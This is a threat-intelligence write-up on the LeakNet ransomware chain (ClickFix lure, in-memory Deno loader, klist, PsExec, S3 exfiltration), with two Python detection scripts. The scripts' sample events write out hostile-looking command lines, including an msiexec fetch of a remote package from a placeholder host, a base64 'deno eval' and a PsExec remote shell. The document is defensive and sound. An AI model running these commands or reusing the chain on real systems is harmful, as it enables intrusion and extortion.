The LeakNet ransomware group has developed a more scalable and evasive attack methodology that leverages ClickFix social engineering techniques to trick users into executing malicious commands disguised as standard verification steps. This approach reduces reliance on traditional access techniques such as credential theft while enabling broader, lower-cost targeting of victims.
Once access is obtained, attackers deploy a covert, fileless payload that uses the Deno runtime to execute malicious code directly in memory, minimizing detection by traditional security tools. Subsequent stages include credential discovery, lateral movement across the network, data exfiltration through trusted cloud services, and eventual ransomware deployment. This evolution highlights a growing trend in which threat actors increasingly exploit legitimate tools and user behavior to bypass conventional defenses, emphasizing the need for improved user awareness and behavior-based detection mechanisms.
The LeakNet ransomware attack chain begins with the delivery of ClickFix prompts through compromised legitimate websites. These prompts present users with fraudulent CAPTCHA or verification messages instructing them to execute a malicious msiexec.exe command. This method allows attackers to bypass traditional exploit-based entry points by relying on user interaction rather than software vulnerabilities. Executing the command launches a staged loader built on the Deno runtime environment, which runs Base64-encoded JavaScript payloads directly in memory. The loader fingerprints the compromised system and initiates command-and-control communication with attacker infrastructure through a continuous polling loop that retrieves additional payloads. Later stages of the attack involve the execution of malicious modules using DLL side-loading techniques, Kerberos ticket enumeration using the built-in klist utility, and lateral movement across the environment through utilities such as PsExec. Data is staged and exfiltrated through cloud storage services, including Amazon S3, to blend with legitimate outbound traffic. The attack ultimately concludes with ransomware deployment and file encryption while maintaining a minimal forensic footprint, since the chain leaves few disk artifacts and relies extensively on living-off-the-land techniques. The details and technicalities of the attack campaign are discussed further
The LeakNet ransomware group primarily gains initial access through the ClickFix technique delivered via compromised legitimate websites. Victims encounter fake CAPTCHA or system error messages instructing them to copy and execute a malicious msiexec.exe command within the Windows Run dialog. This technique exploits user trust in common system prompts and bypasses many traditional network-based security detection mechanisms. Commands entered in the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which makes that key a useful triage artifact when investigating a suspected ClickFix infection.
Additional delivery methods have also been observed, including phishing campaigns conducted through enterprise collaboration platforms such as Microsoft Teams, demonstrating the expansion of delivery vectors used by the group.
The infection chain was identified as follows:
• Victims are lured through compromised websites displaying ClickFix prompts that trick users into executing a malicious msiexec.exe command, initiating the LeakNet ransomware attack chain.
• The command launches a staged fileless loader that uses the Deno runtime to execute Base64-encoded JavaScript directly in memory.
• The loader fingerprints the host system, establishes communication with a command-and-control server, and retrieves additional payloads through a continuous polling mechanism.
• Attackers deploy malicious modules through DLL side-loading, perform credential discovery using tools such as klist, and move laterally across the network using utilities including PsExec.
• Data is staged and exfiltrated to cloud storage services such as Amazon S3, followed by ransomware deployment that encrypts systems and enables double-extortion operations.
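The infection chain above maps onto a small set of process-creation detections that can be correlated per host. The following is an added example (not code from the article or from the threat actor) that runs that logic over constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 records (parent image, image, command line). Every hostname, URL, bucket-style token and command line in the sample events is constructed for illustration and is not an observed indicator; the Deno `eval` form and the explorer.exe-as-parent heuristic for the Run dialog are assumptions about how the chain would surface in telemetry.

```python
"""Process-creation detection for a ClickFix -> Deno loader -> klist -> PsExec chain.

Added example; the event records and command lines below are constructed, not
observed LeakNet indicators."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str    # parent image basename (as Sysmon EID 1 / 4688 report it)
    image: str     # child image basename
    cmdline: str   # full command line


@dataclass(frozen=True)
class Finding:
    host: str
    stage: str
    reason: str
    cmdline: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A long run of base64 alphabet on a command line is the tell for inline, in-memory source.
B64_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
STAGE_ORDER = ["initial_access", "loader", "credential_discovery", "lateral_movement"]


def classify(e: ProcEvent) -> Optional[Tuple[str, str]]:
    img, par, cmd = e.image.lower(), e.parent.lower(), e.cmdline
    # Stage 1: text pasted into Win+R. The Run dialog is hosted by explorer.exe, so the
    # pasted msiexec.exe shows up as a direct child of explorer.exe; a URL as the package
    # argument (msiexec fetches it itself) separates this from local installs.
    if img == "msiexec.exe" and par == "explorer.exe" and URL_RE.search(cmd):
        return "initial_access", "msiexec.exe under explorer.exe with a remote package URL"
    # Stage 2: Deno running inline source (`deno eval ...`) or a base64 blob taken from the
    # command line, so there is no script file on disk for a scanner to inspect.
    if img == "deno.exe" and (re.search(r"\beval\b", cmd) or B64_RE.search(cmd)):
        return "loader", "deno.exe executing inline/base64 JavaScript"
    # Stage 3: klist from an interactive console is routine admin activity; the parent is
    # what makes it suspicious. A grandparent lookup would widen this beyond deno.exe.
    if img == "klist.exe" and par == "deno.exe":
        return "credential_discovery", "klist.exe launched by the Deno runtime"
    # Stage 4: the PsExec client, or PSEXESVC.exe running on the target after service install.
    if img in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}:
        return "lateral_movement", f"{img} execution"
    return None


def detect(events: Iterable[ProcEvent]) -> List[Finding]:
    findings = []
    for e in events:
        hit = classify(e)
        if hit:
            findings.append(Finding(e.host, hit[0], hit[1], e.cmdline))
    return findings


def correlate(findings: Iterable[Finding], min_stages: int = 2) -> dict:
    """Escalate hosts showing two or more distinct stages. A lone msiexec-with-URL event
    is noisy (deployment tooling does the same); the sequence of stages is not."""
    seen_by_host = defaultdict(set)
    for f in findings:
        seen_by_host[f.host].add(f.stage)
    return {h: [s for s in STAGE_ORDER if s in seen]
            for h, seen in seen_by_host.items() if len(seen) >= min_stages}


# Constructed sample telemetry (hypothetical hosts, URL and bucket-style names).
SAMPLE_EVENTS = [
    ProcEvent("WS-0417", "explorer.exe", "msiexec.exe",
              "msiexec.exe /i https://verify.example.invalid/check.msi /qn"),
    ProcEvent("WS-0417", "msiexec.exe", "deno.exe", 'deno.exe eval "' + "QUFB" * 30 + '"'),
    ProcEvent("WS-0417", "deno.exe", "klist.exe", "klist.exe"),
    ProcEvent("WS-0417", "cmd.exe", "psexec.exe", r"psexec.exe \\FS01 -s cmd.exe /c whoami"),
    # Benign look-alikes: local MSI from the Run dialog, and klist run by an admin.
    ProcEvent("WS-0902", "explorer.exe", "msiexec.exe", r"msiexec.exe /i C:\Installers\app.msi /qn"),
    ProcEvent("WS-0902", "cmd.exe", "klist.exe", "klist.exe purge"),
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host}: [{f.stage}] {f.reason}")
    print("escalate:", correlate(hits))
```

The per-event rules are deliberately narrow (parent plus command-line shape) and the correlation step is what turns them into a ransomware-chain alert; in a SIEM the same logic is a join on hostname over a short window, with the grandparent process added to the klist rule.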
The LeakNet ransomware group demonstrates advanced technical capabilities through the use of fileless malware execution and living-off-the-land techniques. By leveraging the Deno runtime to execute Base64-encoded JavaScript payloads directly in memory, the attackers significantly reduce the presence of malicious artifacts on disk and evade traditional signature-based detection systems.
The attack framework enables system fingerprinting, dynamic payload delivery, and persistent command-and-control communication through polling mechanisms. Attackers frequently abuse legitimate system utilities such as msiexec.exe, cmd.exe, and credential enumeration tools including klist to blend malicious activity with normal system operations.
The group also employs modular post-exploitation techniques to maximize operational impact while maintaining stealth. DLL side-loading allows malicious modules to execute within trusted applications, while administrative tools such as PsExec facilitate lateral movement within the network. Data exfiltration through cloud services such as Amazon S3 enables attackers to disguise outbound traffic as normal business activity. This combination of in-memory execution, legitimate tool misuse, and cloud-based staging creates a flexible and highly evasive attack framework designed to prolong dwell time and ensure successful ransomware deployment.
LeakNet first emerged in late 2024 presenting itself as a self-proclaimed “digital watchdog,” but the group has since transitioned into a financially motivated ransomware operation. The group has strategically shifted away from relying on Initial Access Brokers and instead adopted self-sufficient access techniques such as ClickFix-based social engineering.
The adoption of Bring Your Own Runtime techniques, particularly through the use of the Deno runtime environment, demonstrates continued innovation in malware delivery and execution methods. These techniques allow threat actors to bypass traditional detection controls and may influence similar approaches among other ransomware operators.
LeakNet attacks are opportunistic and broadly distributed across global targets. The use of compromised websites as the primary delivery vector allows the group to reach victims worldwide without focusing on specific geographic regions or industries. Observed campaigns indicate that both enterprise and industrial environments are being targeted, with some activity linked to operational technology environments. Because infections depend heavily on user interaction rather than targeted infrastructure compromise, the campaign has the potential to affect organizations across multiple sectors and geographic regions.
LeakNet represents a notable evolution in ransomware operations by combining social engineering, fileless malware execution, and cloud-based data exfiltration into a scalable and repeatable attack framework. The group’s reliance on legitimate tools and user-driven execution challenges many traditional security defenses.
Organizations should prioritize behavioral detection mechanisms, proactive threat hunting capabilities, and enhanced user awareness training in order to detect and disrupt these attacks early in the intrusion lifecycle.
LeakNet attacks combine ransomware encryption with data exfiltration, enabling double-extortion strategies that significantly increase the severity of incidents. Organizations affected by these attacks may experience operational disruption, financial losses, reputational damage, and potential regulatory consequences resulting from data breaches.
The use of stealthy fileless techniques increases the overall risk by extending attacker dwell time and reducing the likelihood of early detection, allowing adversaries to conduct reconnaissance, credential theft, and data staging before ransomware deployment.
• Implement security awareness training programs that specifically address ClickFix-style social engineering techniques, including fake CAPTCHA prompts instructing users to execute system commands.
• Restrict and monitor the use of living-off-the-land binaries such as msiexec.exe and cmd.exe, and of administrative tools such as PsExec, to detect potential misuse.
• Deploy Endpoint Detection and Response solutions capable of identifying in-memory execution, suspicious processes, and abnormal activity related to runtime environments such as Deno.
• Enforce application control policies and allowlisting to block unauthorized execution of scripts and binaries.
• Monitor network traffic for unusual outbound connections, particularly to cloud storage services such as Amazon S3 that may be used for data exfiltration.
• Restrict or tightly control remote administration tools, including PsExec, and ensure that all usage is logged and monitored.
• Strengthen identity and access management practices by enforcing least privilege and monitoring Kerberos ticket enumeration, such as abnormal use of klist outside interactive administrative sessions.
• Maintain secure and regularly tested backups to ensure rapid recovery in the event of ransomware deployment.
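The outbound-monitoring recommendation above is hard to act on because Amazon S3 is also legitimate business traffic. The following is an added example (not code from the article) of the check a practitioner would write over egress or proxy logs: identify S3 endpoint hostnames (virtual-hosted, path-style and legacy region forms), drop buckets the organization sanctions, and rank the rest by upload volume per source host. The log format, the sanctioned-bucket list, the bucket names, the hostnames and the 100 MiB threshold are all constructed assumptions for the example.

```python
"""Flag uploads to unsanctioned Amazon S3 buckets from constructed egress log lines.

Added example; log format, hostnames, bucket names and threshold are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List

# Matches bucket.s3.amazonaws.com, bucket.s3.<region>.amazonaws.com, s3.<region>.amazonaws.com
# and the legacy s3-<region>.amazonaws.com form, but not look-alike domains.
S3_HOST_RE = re.compile(r"(?:^|\.)s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$", re.IGNORECASE)

# Buckets the organization legitimately writes to (hypothetical).
SANCTIONED_S3_HOSTS = {"backup-corp-prod.s3.eu-west-1.amazonaws.com"}
HIGH_VOLUME_BYTES = 100 * 1024 * 1024


@dataclass(frozen=True)
class Alert:
    src_host: str
    dst_host: str
    bytes_out: int
    uploads: int
    severity: str


def is_s3_host(host: str) -> bool:
    return bool(S3_HOST_RE.search(host))


def parse_line(line: str):
    # Assumed log shape: "<timestamp> <src_host> <dst_host> <method> <bytes_out>"
    ts, src, dst, method, bytes_out = line.split()
    return ts, src, dst.lower(), method.upper(), int(bytes_out)


def find_s3_exfil(lines: Iterable[str], sanctioned=SANCTIONED_S3_HOSTS,
                  high_volume: int = HIGH_VOLUME_BYTES) -> List[Alert]:
    """Aggregate PUT/POST bytes per (source, S3 host); any upload to an unsanctioned
    bucket is reported, and one crossing the volume threshold is marked high."""
    totals = defaultdict(lambda: [0, 0])
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        _, src, dst, method, out = parse_line(line)
        if method not in ("PUT", "POST") or not is_s3_host(dst) or dst in sanctioned:
            continue
        totals[(src, dst)][0] += out
        totals[(src, dst)][1] += 1
    alerts = []
    for (src, dst), (out, n) in sorted(totals.items()):
        alerts.append(Alert(src, dst, out, n, "high" if out >= high_volume else "low"))
    return alerts


# Constructed sample egress log (hypothetical hosts and bucket names).
SAMPLE_EGRESS_LOG = """
# sanctioned backup bucket: ignored
2025-01-15T02:14:07Z WS-0417 backup-corp-prod.s3.eu-west-1.amazonaws.com PUT 83886080
# unknown bucket, two large uploads from one workstation
2025-01-15T02:31:55Z WS-0417 d41f9c2.s3.us-east-1.amazonaws.com PUT 734003200
2025-01-15T02:33:10Z WS-0417 d41f9c2.s3.us-east-1.amazonaws.com PUT 512000000
# ordinary browsing and a tiny upload to the same unknown bucket
2025-01-15T03:02:41Z WS-0902 cdn.example.invalid GET 12000
2025-01-15T03:05:12Z WS-0902 d41f9c2.s3.us-east-1.amazonaws.com PUT 2048
""".splitlines()

if __name__ == "__main__":
    for a in find_s3_exfil(SAMPLE_EGRESS_LOG):
        print(f"{a.severity:<4} {a.src_host} -> {a.dst_host}: {a.bytes_out} bytes in {a.uploads} uploads")
```

The low-severity hit for the second host is worth keeping rather than suppressing: a small upload to the same unknown bucket from another endpoint is the staging step the article describes, and correlating on the bucket name across hosts is what exposes it before the bulk transfer.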